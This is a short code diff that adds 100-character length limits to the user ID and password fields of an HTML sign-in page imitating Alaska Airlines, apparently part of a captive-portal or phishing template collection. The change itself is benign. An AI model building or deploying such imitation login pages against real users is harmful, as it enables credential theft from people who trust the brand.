--- a/portals/airlines/AlaskaAirline.html
+++ b/portals/airlines/AlaskaAirline.html
@@ -73,10 +73,10 @@
                     <h1>Sign in</h1>
                     <h2>Use your Alaska Airlines Account</h2>
                     <div class="form-group">
-                        <input id="email-input" name="email" type="text" class="form-control" placeholder="User ID or Mileage Plan number" required>
+                        <input id="email-input" name="email" type="text" class="form-control" placeholder="User ID or Mileage Plan number" maxlength="100" required>
                     </div>
                     <div class="form-group">
-                        <input id="password-input" name="password" type="password" class="form-control" placeholder="Password" required>
+                        <input id="password-input" name="password" type="password" class="form-control" placeholder="Password" maxlength="100" required>
                     </div>
                     <div class="form-group">
                         <button class="btn btn-primary" type="submit">Next</button>
